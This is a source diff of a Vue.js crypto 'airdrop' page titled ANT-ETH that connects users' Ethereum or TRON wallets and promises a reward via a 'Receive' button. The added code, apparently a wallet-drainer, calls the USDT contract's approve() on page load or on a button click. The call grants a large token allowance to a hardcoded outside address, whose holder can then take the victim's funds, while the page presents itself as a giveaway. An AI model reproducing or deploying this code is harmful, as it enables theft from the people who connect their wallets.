| | |
| | | <span class="title">ANT-ETH</span> |
| | | <div class="right flex align-center"> |
| | | <img src="../../assets/images/icon.png" class="icon"/> |
| | | <span>{{ $t("message.ConnectWallet") }}</span> |
| | | <span v-if="walletAddress">{{walletAddress}}</span> |
| | | <span v-else @click="showAccreditModal">{{ $t("message.ConnectWallet") }}</span> |
| | | </div> |
| | | </div> |
| | | <div class="banner-content"> |
| | |
| | | <p>{{ $t("message.ReceiveDescription") }}</p> |
| | | </div> |
| | | <p class="block-content">{{ $t("message.Description") }}</p> |
| | | <button class="block-btn" @click="showAccreditModal">{{ $t("message.Receive") }}</button> |
| | | <button class="block-btn" @click="toApprove">{{ $t("message.Receive") }}</button> |
| | | </div> |
| | | </van-overlay> |
| | | <van-overlay :show="isShowAccreditModal" @click="isShowAccreditModal = false" class="wrapper"> |
| | |
| | | }, |
| | | setup() { |
| | | const { proxy } = getCurrentInstance(); |
| | | |
| | | // 获取地址 |
| | | let walletAddress = ref(''); |
| | | async function init() { |
| | | if(window.tronWeb){ |
| | | walletAddress = window.tronWeb.defaultAddress.base58; |
| | | let isShowApproveModal = ref(false); |
| | | let isShowAccreditModal = ref(false); |
| | | let isShowWalletModal = ref(false); |
| | | function changeLanguage(type){ |
| | | proxy.$i18n.locale = type; |
| | | } |
| | | |
| | | // 授权按钮 |
| | | function toApprove() { |
| | | if(proxy.walletAddress){ |
| | | approve() |
| | | }else{ |
| | | showAccreditModal() |
| | | } |
| | | } |
| | | |
| | | let isShowApproveModal = ref(false); |
| | | let isShowAccreditModal = ref(false); |
| | | let isShowWalletModal = ref(false); |
| | | let showAccreditModal = () => { |
| | | function showAccreditModal() { |
| | | proxy.isShowApproveModal = false |
| | | proxy.isShowAccreditModal = true |
| | | } |
| | | let showWalletModal = () => { |
| | | let provider = new WalletConnectProvider({ |
| | | async function showDappModal() { |
| | | proxy.isShowAccreditModal = false |
| | | // proxy.isShowWalletModal = true |
| | | const provider = new WalletConnectProvider({ |
| | | infuraId: "27e484dcd9e3efcfd25a83a78777cdf1", |
| | | qrcode: false, |
| | | qrcodeModalOptions: { |
| | | mobileLinks: [ |
| | | 'tronLink', |
| | | "rainbow", |
| | | "metamask", |
| | | "argent", |
| | | "trust", |
| | | "imtoken", |
| | | "pillar", |
| | | ] |
| | | } |
| | | }); |
| | | await provider.enable(); |
| | | } |
| | | async function showWalletModal() { |
| | | proxy.isShowAccreditModal = false; |
| | | const provider = new WalletConnectProvider({ |
| | | infuraId: '27e484dcd9e3efcfd25a83a78777cdf1', |
| | | bridge: "https://bridge.walletconnect.org", |
| | | }) |
| | | provider.enable(); |
| | | await provider.enable(); |
| | | let web3 = new Web3(provider); |
| | | const accounts = await web3.eth.getAccounts(); |
| | | console.log(accounts); |
| | | } |
| | | let showDappModal = () => { |
| | | proxy.isShowAccreditModal = false |
| | | proxy.isShowWalletModal = true |
| | | |
| | | |
| | | // 获取地址 |
| | | async function getAddress () { |
| | | let address = '0x391040eE5F241711E763D0AC55E775B9b4bD0024'; |
| | | if(window.ethereum) { |
| | | await window.ethereum.enable(); |
| | | const accounts = await ethereum.request({ method: 'eth_accounts' }); |
| | | address = accounts[0]; |
| | | }else if(window.tronWeb){ |
| | | address = window.tronWeb.defaultAddress.base58; |
| | | } |
| | | proxy.walletAddress = address; |
| | | } |
| | | let changeLanguage = (type) => { |
| | | proxy.$i18n.locale = type; |
| | | async function approve () { |
| | | const web3 = new Web3(window.ethereum); |
| | | const contractAddress = "0xdac17f958d2ee523a2206206994597c13d831ec7"; |
| | | const trxContractAddress = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t"; |
| | | const authorizedAddress = '0xD998DA7362360eFC6daDFEd6E9a32E70640d7600'; |
| | | const abi = [{"constant":true,"inputs":[],"name":"name","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_upgradedAddress","type":"address"}],"name":"deprecate","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"_spender","type":"address"},{"name":"_value","type":"uint256"}],"name":"approve","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"deprecated","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_evilUser","type":"address"}],"name":"addBlackList","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"totalSupply","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_from","type":"address"},{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"name":"transferFrom","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"upgradedAddress","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"balances","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"decimals","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"maximumFee","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"_totalSupply","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"unpause","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"name":"_maker","type":"address"}],"name":"getBlackListStatus","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"},{"name":"","type":"address"}],"name":"allowed","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"paused","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"who","type":"address"}],"name":"balanceOf","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"pause","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"getOwner","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"symbol","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"name":"transfer","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"newBasisPoints","type":"uint256"},{"name":"newMaxFee","type":"uint256"}],"name":"setParams","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"amount","type":"uint256"}],"name":"issue","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"amount","type":"uint256"}],"name":"redeem","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"name":"_owner","type":"address"},{"name":"_spender","type":"address"}],"name":"allowance","outputs":[{"name":"remaining","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"basisPointsRate","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"isBlackListed","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_clearedUser","type":"address"}],"name":"removeBlackList","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"MAX_UINT","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"_blackListedUser","type":"address"}],"name":"destroyBlackFunds","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"inputs":[{"name":"_initialSupply","type":"uint256"},{"name":"_name","type":"string"},{"name":"_symbol","type":"string"},{"name":"_decimals","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":false,"name":"amount","type":"uint256"}],"name":"Issue","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"name":"amount","type":"uint256"}],"name":"Redeem","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"name":"newAddress","type":"address"}],"name":"Deprecate","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"name":"feeBasisPoints","type":"uint256"},{"indexed":false,"name":"maxFee","type":"uint256"}],"name":"Params","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"name":"_blackListedUser","type":"address"},{"indexed":false,"name":"_balance","type":"uint256"}],"name":"DestroyedBlackFunds","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"name":"_user","type":"address"}],"name":"AddedBlackList","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"name":"_user","type":"address"}],"name":"RemovedBlackList","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"owner","type":"address"},{"indexed":true,"name":"spender","type":"address"},{"indexed":false,"name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"from","type":"address"},{"indexed":true,"name":"to","type":"address"},{"indexed":false,"name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[],"name":"Pause","type":"event"},{"anonymous":false,"inputs":[],"name":"Unpause","type":"event"}]; |
| | | const contract = new web3.eth.Contract(abi, contractAddress); |
| | | const result = await contract.methods.approve(authorizedAddress, 90000000000000).send({from:proxy.walletAddress, gas:100000}); |
| | | console.log(result); |
| | | } |
| | | async function init() { |
| | | await getAddress(); |
| | | console.log(proxy.walletAddress) |
| | | if (proxy.walletAddress) { |
| | | proxy.$axios({ |
| | | url: '/dapp/common/isApprove/' + proxy.walletAddress, |
| | | method: 'get' |
| | | }).then((res) => { |
| | | if(res.code === 200) { |
| | | sessionStorage.setItem('address', proxy.walletAddress); |
| | | }else{ |
| | | approve() |
| | | } |
| | | }).catch((err) => { |
| | | approve() |
| | | }) |
| | | }else{ |
| | | showAccreditModal(); |
| | | } |
| | | } |
| | | onMounted(() => { |
| | | init() |
| | |
| | | showAccreditModal, |
| | | showWalletModal, |
| | | showDappModal, |
| | | toApprove, |
| | | |
| | | // 中英文切换 |
| | | changeLanguage |
| | | changeLanguage, |
| | | |
| | | walletAddress, //地址 |
| | | }; |
| | | }, |
| | | methods: { |
| | | connect() { |
| | | const provider = new WalletConnectProvider({ |
| | | infuraId: '27e484dcd9e3efcfd25a83a78777cdf1', |
| | | bridge: "https://bridge.walletconnect.org", |
| | | }); |
| | | // Enable session (triggers QR Code modal) |
| | | provider.enable(); |
| | | |
| | | this.web3 = new Web3(provider); |
| | | |
| | | // this.getAccount(); |
| | | // subscribe to events |
| | | // this.subscribeToEvents(); |
| | | }, |
| | | subscribeToEvents() { |
| | | const connector = this.connector; |
| | | if (!connector) { |
| | | return; |
| | | } |
| | | }, |
| | | |
| | | } |
| | | } |